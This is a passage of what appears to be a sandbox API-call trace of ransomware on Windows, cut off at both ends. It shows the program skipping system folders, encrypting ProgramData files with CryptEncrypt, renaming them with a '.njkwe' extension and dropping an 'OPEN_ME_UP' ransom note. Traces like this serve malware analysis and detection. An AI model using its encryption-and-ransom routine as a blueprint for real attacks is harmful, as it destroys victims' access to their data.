liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.211] WriteFile (in: hFile=0x438, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f04c*=0x1cc, lpOverlapped=0x0) returned 1 [0076.211] GetProcessHeap () returned 0xbe0000 [0076.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.212] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.212] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0076.212] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0076.212] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0076.212] CloseHandle (hObject=0x438) returned 1 [0076.212] GetProcessHeap () returned 0xbe0000 [0076.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.213] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0076.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.213] GetProcessHeap () returned 0xbe0000 [0076.213] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.213] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f66020, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f66020, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f66020, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0076.213] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0076.213] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0076.213] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.213] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0076.214] CloseHandle (hObject=0x434) returned 1 [0076.214] GetProcessHeap () returned 0xbe0000 [0076.214] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.214] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0076.214] FindClose (in: hFindFile=0xc19de0 | out: hFindFile=0xc19de0) returned 1 [0076.214] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0076.215] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.216] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0076.217] CloseHandle (hObject=0x430) returned 1 [0076.217] GetProcessHeap () returned 0xbe0000 [0076.217] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0076.217] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{c5dc3753-b6c8-4057-b396-bf13d769311c}", cAlternateFileName="{C5DC3~1")) returned 1 [0076.217] lstrcmpiW (lpString1="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="Windows") returned -1 [0076.217] lstrcmpiW (lpString1="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="$Recycle.bin") returned 1 [0076.217] lstrcmpiW (lpString1="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="System Volume Information") returned -1 [0076.217] lstrcmpiW (lpString1="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="Program Files") returned -1 [0076.217] lstrcmpiW (lpString1="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="Program Files (x86)") returned -1 [0076.217] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}") returned 80 [0076.217] lstrcmpW (lpString1="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2=".") returned 1 [0076.217] lstrcmpW (lpString1="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="..") returned 1 [0076.217] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.217] GetProcessHeap () returned 0xbe0000 [0076.217] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0076.217] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*") returned 82 [0076.217] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ca0 [0076.218] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.218] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.218] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.218] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.218] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.218] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\.") returned 82 [0076.218] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.218] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.218] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.218] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.218] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.218] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.218] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.218] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\..") returned 83 [0076.218] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.218] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.218] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fc7d5e, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fc7d5e, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fc7d5e, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0076.218] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0076.218] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0076.218] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0076.218] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0076.218] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0076.218] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml") returned 99 [0076.218] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0076.218] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.218] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0076.218] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.218] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.219] GetTickCount () returned 0x115365e [0076.219] GetTickCount () returned 0x115365e [0076.219] GetTickCount () returned 0x115365e [0076.219] GetTickCount () returned 0x115365e [0076.219] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.219] GetProcessHeap () returned 0xbe0000 [0076.219] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.219] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x67b, lpOverlapped=0x0) returned 1 [0076.221] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff985, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.221] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x67b, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x67b, lpOverlapped=0x0) returned 1 [0076.221] GetProcessHeap () returned 0xbe0000 [0076.221] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.221] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.221] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.221] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.221] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.221] CloseHandle (hObject=0x434) returned 1 [0076.221] GetProcessHeap () returned 0xbe0000 [0076.221] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.221] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0076.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.222] GetProcessHeap () returned 0xbe0000 [0076.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.222] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fa1af1, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fa1af1, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fa1af1, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0076.222] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0076.222] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0076.222] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0076.222] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0076.222] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0076.222] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml") returned 100 [0076.222] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0076.222] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.222] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0076.222] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.222] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.223] GetTickCount () returned 0x115365e [0076.223] GetTickCount () returned 0x115365e [0076.223] GetTickCount () returned 0x115365e [0076.223] GetTickCount () returned 0x115365e [0076.223] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.223] GetProcessHeap () returned 0xbe0000 [0076.223] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.223] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.225] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.225] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.225] GetProcessHeap () returned 0xbe0000 [0076.225] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.225] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.225] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.225] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.226] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.226] CloseHandle (hObject=0x434) returned 1 [0076.226] GetProcessHeap () returned 0xbe0000 [0076.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.226] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0076.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.226] GetProcessHeap () returned 0xbe0000 [0076.226] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.226] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0076.226] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0076.226] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0076.226] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0076.226] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0076.226] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0076.226] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov") returned 85 [0076.226] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0076.227] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0076.227] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.227] GetProcessHeap () returned 0xbe0000 [0076.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.227] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*") returned 87 [0076.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ea0 [0076.227] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.227] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.227] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.227] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.227] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.227] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\.") returned 87 [0076.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.227] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d15f260, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d15f260, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d15f260, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.227] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.227] lstrcmpiW 